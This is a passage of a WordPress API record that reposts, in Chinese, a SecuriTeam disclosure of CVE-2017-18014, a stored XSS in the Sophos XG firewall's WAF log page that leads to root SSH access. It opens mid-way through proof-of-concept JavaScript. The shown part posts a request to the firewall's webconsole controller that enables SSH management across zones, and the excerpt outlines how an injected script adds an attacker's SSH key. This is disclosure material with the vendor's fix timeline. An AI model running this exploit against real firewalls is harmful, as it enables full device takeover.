class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">param<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-37\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ajax2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-s\">&#8216;{&#8220;localaclid&#8221;:[&#8220;LAN#2&#8243;,&#8221;LAN#4&#8243;,&#8221;LAN#6&#8243;,&#8221;LAN#13&#8243;,&#8221;LAN#5&#8243;,&#8221;LAN#9&#8243;,&#8221;LAN#8&#8243;,&#8221;LAN#14&#8243;,&#8221;LAN#10&#8243;,&#8221;LAN#7&#8243;,&#8221;LAN#38&#8243;,&#8221;LAN#23&#8243;,&#8221;LAN#18&#8243;,&#8221;WAN#4&#8243;,&#8221;WAN#10&#8243;,&#8221;WAN#38&#8243;,&#8221;DMZ#10&#8243;,&#8221;DMZ#38&#8243;,&#8221;DMZ#18&#8243;,&#8221;VPN#18&#8243;,&#8221;WiFi#2&#8243;,&#8221;WiFi#4&#8243;,&#8221;WiFi#6&#8243;,&#8221;WiFi#13&#8243;,&#8221;WiFi#5&#8243;,&#8221;WiFi#9&#8243;,&#8221;WiFi#8&#8243;,&#8221;WiFi#14&#8243;,&#8221;WiFi#10&#8243;,&#8221;WiFi#7&#8243;,&#8221;WiFi#38&#8243;,&#8221;WiFi#23&#8243;,&#8221;WiFi#18&#8221;]}&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-38\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">param2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;csrf=&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">csrf<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;&amp;mode=72&amp;json=&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">ajax2<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;&amp;__RequestType=ajax&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-39\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">XMLHttpRequest<\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-40\"><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;POST&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">IPV<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;\/webconsole\/Controller&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-41\"><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setRequestHeader<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Content-type&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;application\/x-www-form-urlencoded&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-42\"><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">onreadystatechange<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-43\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xhttp2<\/span><span 
class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">readyState<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getElementById<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;peruid2&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">contentWindow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-45\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span 
class=\"crayon-v\">doc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">responseText<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-49\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-50\"><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">send<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">param2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<\/div><\/div>\n<p><a 
href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3645\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2-300x169.jpg\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 22 Jan 2018 11:52:38 +0000<\/strong><\/p>\n<p>\u6f0f\u6d1e\u6982\u8981 \u4ee5\u4e0b\u5b89\u5168\u516c\u544a\u63cf\u8ff0\u4e86\u5728Sophos XG 17\u4e2d\u53d1\u73b0\u7684\u4e00\u4e2a\u5b58\u50a8\u578bXSS\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u8be5\u6f0f\u6d1e\u53ef\u4ee5\u83b7\u53d6root\u8bbf\u95ee\u3002 Sophos XG\u9632\u706b\u5899\u201c\u5168\u65b0\u7684\u63a7\u5236\u4e2d\u5fc3\u4e3a\u7528\u6237\u7684\u7f51\u7edc\u63d0\u4f9b\u524d\u6240\u672a\u6709\u7684\u53ef\u89c6\u6027\u3002\u53ef\u4ee5\u83b7\u5f97\u4e30\u5bcc\u7684\u62a5\u544a\uff0c\u8fd8\u53ef\u4ee5\u6dfb\u52a0Sophos iView\uff0c\u4ee5\u4fbf\u8de8\u591a\u4e2a\u9632\u706b\u5899\u8fdb\u884c\u96c6\u4e2d\u62a5\u544a\u3002\u201c \u6f0f\u6d1e\u63d0\u4ea4\u8005 \u4e00\u4f4d\u72ec\u7acb\u7684\u5b89\u5168\u7814\u7a76\u4eba\u5458\u5411 Beyond Security \u7684 SSD \u62a5\u544a\u4e86\u8be5\u6f0f\u6d1e \u5382\u5546\u54cd\u5e94 Sophos\u5df2\u88ab\u544a\u77e5\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u4ed6\u4eec\u7684\u56de\u5e94\u662f\uff1a 12\u670811\u65e5\uff0c\u6211\u4eec\u6536\u5230\u5e76\u786e\u8ba4\u60a8\u63d0\u4ea4\u7684\u95ee\u9898 12\u670812\u65e5\uff0c\u6211\u4eec\u786e\u8ba4\u4e86\u8fd9\u4e2a\u95ee\u9898\uff0c\u5e76\u5f00\u59cb\u8fdb\u884c\u4fee\u590d 12\u670820\u65e5\uff0c\u6211\u4eec\u53d1\u5e03\u4e86XGv17 MR3\u7684\u5b98\u65b9\u4fee\u590d\uff1ahttps\uff1ahttps:\/\/community.sophos.com\/products\/xg-firewall\/b\/xg-blog\/posts\/sfos-17-0-3-mr3-released 12\u670829\u65e5\uff0c\u6211\u4eec\u5b8c\u6210\u4e86\u5bf9\u4e4b\u524d\u53d1\u5e03\u7684XGv16\uff0cv16.5\uff0cv17\u7248\u672c\u7684\u4fee\u590d 
12\u670831\u65e5\uff0c\u6211\u4eec\u6839\u636e\u60a8\u7684\u8981\u6c42\u53d1\u5e03\u4e86\u6211\u4eec\u7684\u5b89\u5168\u516c\u544a\uff1ahttps:\/\/community.sophos.com\/kb\/en-us\/128024?elqTrackId=3a6db4656f654d65b352f526d26c6a17&#038;elq=1514ab02d2764e8cb73e6b0bdbe7e7be&#038;elqaid=2739&#038;elqat=1&#038;elqCampaignId=27053 CVE\uff1aCVE-2017-18014 \u6f0f\u6d1e\u8be6\u7ec6\u4fe1\u606f \u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u7528\u6237\u53ef\u4ee5\u5728webadmin\u754c\u9762\u4e2d\u7684WAF\u65e5\u5fd7\u9875\u9762\uff08\u63a7\u5236\u4e2d\u5fc3 &#8211; >\u65e5\u5fd7\u6d4f\u89c8\u5668 &#8211; >\uff0c\u5728\u8fc7\u6ee4\u5668\u9009\u9879\u201cWeb\u670d\u52a1\u5668\u4fdd\u62a4\u201d\u4e2d\uff09\u4e2d\u89e6\u53d1\u5b58\u50a8\u578bXSS\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u53ef\u6267\u884c\u9632\u706b\u5899webadmin \u53ef\u4ee5\u6267\u884c\u7684\u4efb\u4f55\u52a8\u4f5c\uff08\u521b\u5efa\u65b0\u7684\u7528\u6237\/ \u542f\u7528ssh\u548c\u6dfb\u52a0ssh\u6388\u6743\u5bc6\u94a5\u7b49\uff09\u3002 \u4e3a\u4e86\u89e6\u53d1\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u6211\u4eec\u5c06\u6f14\u793a\u4ee5\u4e0b\u573a\u666f\uff1a Sophos XG Firewall\u914d\u7f6e3\u4e2a\u533a\u57df\uff1aTrusted\uff0cUntrusted\uff0cDMZ WEB\u670d\u52a1\u5668\u88ab\u653e\u7f6e\u5728DMZ\u4e2d \u9632\u706b\u5899\u4f7f\u7528Sophos\u63a8\u8350\u7684\u9ed8\u8ba4Web\u5e94\u7528\u9632\u706b\u5899\uff08WAF\uff09\u4fdd\u62a4Web\u670d\u52a1\u5668\u3002 \u6765\u81eaUntrusted\u7f51\u7edc\u7684\u653b\u51fb\u8005\u5411DMZ\u4e2d\u7684Web\u670d\u52a1\u5668\u53d1\u9001URL\u8bf7\u6c42\uff0c\u9020\u6210\u5230\u811a\u672c\u6ce8\u5165WAF\u65e5\u5fd7\u9875\u9762 \u6765\u81eaTrusted\u7684\u7ba1\u7406\u5458\u8bbf\u95eeWAF\u65e5\u5fd7\u9875\u9762 \u6ca1\u6709\u4efb\u4f55\u5176\u4ed6\u4ea4\u4e92\u6216\u8b66\u544a\uff0c\u811a\u672c\u5411\u7ba1\u7406\u7528\u6237\u6dfb\u52a0\u4e00\u4e2aSSH\u6388\u6743\u5bc6\u94a5\uff0c\u5e76\u5141\u8bb8\u6765\u81eaUntrusted\u7684ssh\u7ba1\u7406\u3002 \u653b\u51fb\u8005\u83b7\u5f97\u5b8c\u6574\u7684root ssh shell Sophos 
XG WAF\u65e5\u5fd7\u9875\u9762\u5c06\u6267\u884cPOST\u8bf7\u6c42\u4e2d\u201cUser-Agent\u201d\u53c2\u6570\u3002 \u6f0f\u6d1e\u8bc1\u660e Sophos XG\u914d\u7f6e: \u9632\u706b\u5899\u63a5\u53e3\u53ef\u4fe1 &#8211; 192.168.10.190\u7aef\u53e3A. \u9632\u706b\u5899\u63a5\u53e3\u4e0d\u53ef\u4fe1 &#8211; 192.168.0.192\u7aef\u53e3B. &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3645\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD\u5b89\u5168\u516c\u544a-Sophos XG\u4ece\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u5b58\u50a8\u578bXSS\u6f0f\u6d1e\u5230Root\u8bbf\u95ee<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[15774,17105,11851,10757,12136],"class_list":["post-11197","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-chinese-translation","tag-persistent-xss","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11197","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=11197"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11197\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=11197"}],"wp:term":[{"taxono
my":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=11197"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=11197"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}